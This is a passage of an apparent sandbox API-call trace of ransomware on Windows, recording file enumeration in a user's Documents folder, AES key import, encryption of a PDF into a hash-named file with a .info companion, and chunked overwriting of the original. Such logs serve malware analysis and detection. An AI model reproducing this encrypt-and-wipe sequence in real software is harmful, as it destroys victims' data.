ftLastAccessTime.dwHighDateTime=0x1d4c8cd, ftLastWriteTime.dwLowDateTime=0x91394f10, ftLastWriteTime.dwHighDateTime=0x1d4c8cd, nFileSizeHigh=0x0, nFileSizeLow=0x11b0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="QwKKRF bRs.pps", cAlternateFileName="QWKKRF~1.PPS")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816aa3d0, ftCreationTime.dwHighDateTime=0x1d4cd7e, ftLastAccessTime.dwLowDateTime=0xbe963d40, ftLastAccessTime.dwHighDateTime=0x1d4cfbe, ftLastWriteTime.dwLowDateTime=0xbe963d40, ftLastWriteTime.dwHighDateTime=0x1d4cfbe, nFileSizeHigh=0x0, nFileSizeLow=0x25d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sLc4.ots", cAlternateFileName="")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe53d70, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x888f6a30, ftLastAccessTime.dwHighDateTime=0x1d4d0e7, ftLastWriteTime.dwLowDateTime=0x888f6a30, ftLastWriteTime.dwHighDateTime=0x1d4d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="vAMsgJG.csv", cAlternateFileName="")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711932f0, ftCreationTime.dwHighDateTime=0x1d4cbab, ftLastAccessTime.dwLowDateTime=0x91f72e80, ftLastAccessTime.dwHighDateTime=0x1d4ce78, ftLastWriteTime.dwLowDateTime=0x91f72e80, ftLastWriteTime.dwHighDateTime=0x1d4ce78, nFileSizeHigh=0x0, nFileSizeLow=0x140d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="WbzYG9EBYngVeBZSG4.odt", cAlternateFileName="WBZYG9~1.ODT")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed75dd0, ftCreationTime.dwHighDateTime=0x1d4cb2b, ftLastAccessTime.dwLowDateTime=0x8d844440, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0x8d844440, ftLastWriteTime.dwHighDateTime=0x1d4cdd9, nFileSizeHigh=0x0, nFileSizeLow=0x6f47, dwReserved0=0x0, dwReserved1=0x0, cFileName="wKzYgXHHu.docx", cAlternateFileName="WKZYGX~1.DOC")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x606b1060, ftCreationTime.dwHighDateTime=0x1d4cc7b, ftLastAccessTime.dwLowDateTime=0x5328e720, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x5328e720, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x154ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="XTH7srL5Om21.doc", cAlternateFileName="XTH7SR~1.DOC")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5b8570, ftCreationTime.dwHighDateTime=0x1d4ccb2, ftLastAccessTime.dwLowDateTime=0x445d90d0, ftLastAccessTime.dwHighDateTime=0x1d4ce5d, ftLastWriteTime.dwLowDateTime=0x445d90d0, ftLastWriteTime.dwHighDateTime=0x1d4ce5d, nFileSizeHigh=0x0, nFileSizeLow=0x113ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="xvA17L8R.xlsx", cAlternateFileName="XVA17L~1.XLS")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa453810, ftCreationTime.dwHighDateTime=0x1d4d48b, ftLastAccessTime.dwLowDateTime=0xce8ca390, ftLastAccessTime.dwHighDateTime=0x1d4cf25, ftLastWriteTime.dwLowDateTime=0xce8ca390, ftLastWriteTime.dwHighDateTime=0x1d4cf25, nFileSizeHigh=0x0, nFileSizeLow=0x161ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="YnO -aU8WOlRIF.csv", cAlternateFileName="YNO-AU~1.CSV")) returned 1 [0076.040] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa453810, ftCreationTime.dwHighDateTime=0x1d4d48b, ftLastAccessTime.dwLowDateTime=0xce8ca390, ftLastAccessTime.dwHighDateTime=0x1d4cf25, ftLastWriteTime.dwLowDateTime=0xce8ca390, ftLastWriteTime.dwHighDateTime=0x1d4cf25, nFileSizeHigh=0x0, nFileSizeLow=0x161ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="YnO -aU8WOlRIF.csv", cAlternateFileName="YNO-AU~1.CSV")) returned 0 [0076.041] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0076.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0076.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0076.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.042] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b7510) returned 1 [0076.043] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x21bf7c8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a6269f0) returned 1 [0076.043] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.043] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.043] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21bf8b8, pdwDataLen=0x1bf5d230 | out: pbData=0x21bf8b8*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.043] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x21bf9d8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626e50) returned 1 [0076.043] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.043] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.043] CryptDuplicateKey (in: hKey=0x1a626e50, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626d70) returned 1 [0076.043] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.043] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x4, pbData=0x21bfb20*=0x1, dwFlags=0x0) returned 1 [0076.043] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x1, pbData=0x21bfad0, dwFlags=0x0) returned 1 [0076.043] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.043] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.043] GetFileType (hFile=0x36c) returned 0x1 [0076.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.044] GetFileType (hFile=0x36c) returned 0x1 [0076.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", lpFilePart=0x0) returned 0x51 [0076.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0076.044] GetFileType (hFile=0x358) returned 0x1 [0076.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.044] GetFileType (hFile=0x358) returned 0x1 [0076.044] ReadFile (in: hFile=0x36c, lpBuffer=0x21bfef0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21bfef0*, lpNumberOfBytesRead=0x1bf5d128*=0xe0b0, lpOverlapped=0x0) returned 1 [0076.045] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21d3f08*, pdwDataLen=0x1bf5d180*=0xe0b0, dwBufLen=0xe0b0 | out: pbData=0x21d3f08*, pdwDataLen=0x1bf5d180*=0xe0b0) returned 1 [0076.046] WriteFile (in: hFile=0x358, lpBuffer=0x21d3f08*, nNumberOfBytesToWrite=0xe0b0, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x21d3f08*, lpNumberOfBytesWritten=0x1bf5d118*=0xe0b0, lpOverlapped=0x0) returned 1 [0076.047] ReadFile (in: hFile=0x36c, lpBuffer=0x21bfef0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21bfef0*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.047] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21e1ff8*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x21e1ff8*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.047] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21e2048*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x21e2048*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.047] WriteFile (in: hFile=0x358, lpBuffer=0x21e2098*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x21e2098*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.047] CloseHandle (hObject=0x358) returned 1 [0076.049] CloseHandle (hObject=0x36c) returned 1 [0076.049] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0076.049] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.049] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.049] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", lpFilePart=0x0) returned 0x51 [0076.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.049] GetFileType (hFile=0x36c) returned 0x1 [0076.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.049] GetFileType (hFile=0x36c) returned 0x1 [0076.049] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.070] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.071] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.073] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.074] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.075] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.075] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0xc0, lpOverlapped=0x0) returned 1 [0076.075] ReadFile (in: hFile=0x36c, lpBuffer=0x21e37a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e37a0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.075] CloseHandle (hObject=0x36c) returned 1 [0076.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487.info", lpFilePart=0x0) returned 0x56 [0076.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.077] GetFileType (hFile=0x36c) returned 0x1 [0076.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.077] GetFileType (hFile=0x36c) returned 0x1 [0076.077] WriteFile (in: hFile=0x36c, lpBuffer=0x21f0a28*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21f0a28*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.078] CloseHandle (hObject=0x36c) returned 1 [0076.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.080] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5f0d180, ftCreationTime.dwHighDateTime=0x1d4d3a7, ftLastAccessTime.dwLowDateTime=0x5608acf0, ftLastAccessTime.dwHighDateTime=0x1d4cc0c, ftLastWriteTime.dwLowDateTime=0x5608acf0, ftLastWriteTime.dwHighDateTime=0x1d4cc0c, nFileSizeHigh=0x0, nFileSizeLow=0xe0b0)) returned 1 [0076.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.080] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", dwFileAttributes=0x80) returned 1 [0076.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.080] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), fInfoLevelId=0x0, lpFileInformation=0x21f8630 | out: lpFileInformation=0x21f8630*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc5f0d180, ftCreationTime.dwHighDateTime=0x1d4d3a7, ftLastAccessTime.dwLowDateTime=0x5608acf0, ftLastAccessTime.dwHighDateTime=0x1d4cc0c, ftLastWriteTime.dwLowDateTime=0x5608acf0, ftLastWriteTime.dwHighDateTime=0x1d4cc0c, nFileSizeHigh=0x0, nFileSizeLow=0xe0b0)) returned 1 [0076.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.081] GetFileType (hFile=0x36c) returned 0x1 [0076.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.081] GetFileType (hFile=0x36c) returned 0x1 [0076.081] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.082] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.082] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.083] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.084] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.085] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.085] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.086] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.087] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.088] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.088] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 